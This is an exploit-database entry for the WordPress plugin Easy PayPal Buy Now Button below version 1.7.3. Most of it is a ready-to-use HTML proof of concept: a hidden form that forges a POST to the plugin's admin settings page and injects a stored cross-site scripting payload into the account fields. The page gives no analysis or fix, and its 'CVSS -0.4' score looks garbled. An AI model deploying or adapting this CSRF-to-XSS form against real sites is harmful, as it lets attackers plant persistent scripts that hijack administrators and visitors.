Exploit for Easy PayPal Buy Now Button < 1.7.3 - CSRF to Stored Cross-Site Scripting

Name: Exploit for Easy PayPal Buy Now Button < 1.7.3 - CSRF to Stored Cross-Site Scripting
Rating: 5 (68 reviews)

2021-10-04 | CVSS -0.4

## https://sploitus.com/exploit?id=WPEX-ID:4127B76C-4E4B-483B-8905-B5CA6D24337D
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wp-ecommerce-settings" method="POST">
      <input type="hidden" name="language" value="3" />
      <input type="hidden" name="currency" value="25" />
      <input type="hidden" name="liveaccount" value="'><script>alert(/XSS/)</script>" />
      <input type="hidden" name="sandboxaccount" value="">" />
      <input type="hidden" name="mode" value="2" />
      <input type="hidden" name="paymentaction" value="1" />
      <input type="hidden" name="size" value="2" />
      <input type="hidden" name="opens" value="2" />
      <input type="hidden" name="cancel" value="">" />
      <input type="hidden" name="return" value="">" />
      <input type="hidden" name="update" value="" />
      <input type="hidden" name="btn2" value="Save Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

All parameters are affected, such as sandboxaccount etc